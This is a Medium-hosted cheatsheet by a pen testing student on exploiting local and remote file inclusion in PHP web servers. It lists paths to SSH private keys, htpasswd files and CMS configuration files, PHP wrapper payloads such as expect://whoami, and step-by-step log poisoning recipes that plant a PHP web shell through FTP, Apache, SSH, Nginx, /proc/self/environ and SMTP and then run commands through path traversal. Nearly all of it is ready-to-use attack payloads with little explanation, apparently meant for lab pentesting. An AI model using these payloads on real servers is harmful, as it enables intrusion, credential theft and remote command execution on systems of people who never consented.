LFI / RFI Cheatsheet

Passwords & Credentials

SSH

/var/lib/username/.ssh/id_rsa
/home/username/.ssh/id_rsa

Apache

/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/etc/apache2/htpasswd
/etc/apache2/.htpasswd
/etc/apache/.htpasswd
/etc/apache2/apache2.conf

CMS

WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php

XAMPP

C:/xampp/security/webdav.htpasswd

C:/xampp/apache/conf/httpd.conf

C:/xampp/apache/logs/access.log

PHP Wrapper

php://filter/convert.base64-encode/resource=

file=expect://whoami

php://input&cmd=whoami

Log Poisoning

FTP

Firstly, you need to be able to access:

../../../../../../../../var/log/vsftpd.log

If this is possible, attempt to log in:

ftp 192.168.x.x

Supply the following name:

Name: <?php system($_GET[‘cmd’]); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/vsftpd.log&cmd=whoami

Apache2 I

Firstly, you need to be able to access:

../../../../../../../../var/log/apache2/access.log

If this is possible, attempt to poison:

nc 192.168.xx.xx 80

Enter the following and press enter:

<?php system($_GET[‘cmd’]); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/apache2/access.log&cmd=whoami

Apache2 II

Firstly, you need to be able to access:

../../../../../../../../var/log/apache2/access.log

If this is possible, attempt to poison within the User-Agent:

<?php system($_GET[‘cmd’]); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/apache2/access.log&cmd=whoami

SSH

Firstly, you need to be able to access:

../../../../../../../../var/log/auth.log

Attempt to login using the following:

ssh ‘<?php echo system($_GET[“cmd”]); exit; ?>’@192.168.x.x

Exit and attempt the below execution:

../../../../../../../../var/log/auth.log&cmd=whoami

Nginx

Firstly, you need to be able to access:

../../../../../../../../var/log/nginx/access.log

Attempt to inject the following:

http://192.168.x.x/file.php?file=<?php system($_GET[‘cmd’]); ?>

Attempt the below execution:

../../../../../../../../var/log/nginx/error.log&cmd=whoami

Environ

Firstly, you need to be able to access:

../../../../../../../../proc/self/environ

If this is possible, attempt to poison within the User-Agent:

<?php system($_GET[‘cmd’]); ?>

Exit and attempt the below execution:

../../../../../../../../proc/self/environ&cmd=whoami

SMTP

Get username first (/etc/passwd)

telnet 192.168.x.x 25

Enter the following:

EHLO andy

VRFY username@localhost

mail from: andy@hack.com

rcpt to: username@localhost

data

Subject: owned

<?php echo system($_REQUEST[‘cmd’]); ?>

Press Enter.

dot (.)

Press Enter.

Exit and attempt the below execution:

../../../../../../../../var/mail/username&cmd=whoami

Pen Testing Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A Quick Performance Optimization Guide Using PHP Generators

Flutter, Is 4GB RAM Enough To Run It?

Deploy a Shiny web application online for free

What Is a Changelog?

Working with REST APIs — Flutter💙

FluxCD — Deploy a Helm Chat from Git

Tweet or Cheat Reaches the App Store

This week in #Scala (Aug 16th, 2021)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Andy Gregg

Andy Gregg

Pen Testing Student

More from Medium

The Dirty Pipe Vulnerability On Linux

Linux Dirty Pipe Vulnerability CVE-2022–0847

1–2) Introductory Course: CyberSecurity Research

Playing MP4 videos on Elementary OS

Windows Fundamentals 1 — TryHackMe